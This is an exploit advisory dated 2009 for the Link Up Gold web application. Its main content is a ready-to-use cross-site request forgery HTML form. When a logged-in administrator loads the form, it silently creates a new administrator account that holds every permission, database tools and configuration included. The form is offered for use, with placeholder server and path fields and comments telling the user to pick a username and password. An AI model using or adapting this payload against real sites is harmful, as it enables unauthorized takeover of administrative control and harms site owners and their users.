Link Up Gold CSRF - Create Administrator Account :

Date : 2009-12-14 Author : bi0
                ______     __     ______
               /  ==    /    /  __ 
                  __<         / 
                 \_____   \_   \_____
                 /_____/   /_/   /_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] Link Up Gold - [ CSRF ] Create Administrator Account
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: [email protected]
# [x] Homepage : www.ssteam.ws
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#     [ Login ]
#     http://localhost/[path]/administration/index.php
#
# // Start CSRF
|-------------------------------------------------------------------------------|
<html>
<body>
<form action="http://[server]/[path]/administration/administrators.php" method="POST">
  <input type="hidden" name="action" value="admin_created">
  <!-- chose username -->
  <input   name="username" value="admintest" maxlength=15
   <!-- chose password -->
  <input   name="password" value="admintest" maxlength=15>
   <!-- chose email -->
  <input   name="email" value="[email protected]" maxlength="255">
  <!-- chose name -->
  <input  name="name" value="admintest" maxlength="255">
 <input type="hidden" name="rights[]" value="links" CHECKED>
 <input type="hidden" name="rights[]" value="all_links" CHECKED>
 <input type="hidden" name="rights[]" value="categories_links" CHECKED>
 <input type="hidden" name="rights[]" value="articles" CHECKED>
 <input type="hidden" name="rights[]" value="all_articles" CHECKED>
 <input type="hidden" name="rights[]" value="categories_articles" CHECKED>
 <input type="hidden" name="rights[]" value="email_owners" CHECKED>
 <input type="hidden" name="rights[]" value="blacklist" CHECKED>
 <input type="hidden" name="rights[]" value="polls" CHECKED>
 <input type="hidden" name="rights[]" value="users" CHECKED>
 <input type="hidden" name="rights[]" value="email_users" CHECKED>
 <input type="hidden" name="rights[]" value="newsletter" CHECKED>
 <input type="hidden" name="rights[]" value="board" CHECKED>
 <input type="hidden" name="rights[]" value="search_log" CHECKED>
 <input type="hidden" name="rights[]" value="ads" CHECKED>
 <input type="hidden" name="rights[]" value="adlinks" CHECKED>
 <input type="hidden" name="rights[]" value="news" CHECKED>
 <input type="hidden" name="rights[]" value="messages" CHECKED>
 <input type="hidden" name="rights[]" value="templates" CHECKED>
 <input type="hidden" name="rights[]" value="adv_prices_orders" CHECKED>
 <input type="hidden" name="rights[]" value="admins" CHECKED>
 <input type="hidden" name="rights[]" value="database_tools" CHECKED>
 <input type="hidden" name="rights[]" value="configuration"CHECKED>
 <input type="hidden" name="rights[]" value="reset_rebuild" CHECKED>
 <input type="submit" name="submit" value="Submit">
</form>
</body>
</html>

|-------------------------------------------------------------------------------|
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF

C1

 

C2

 

C3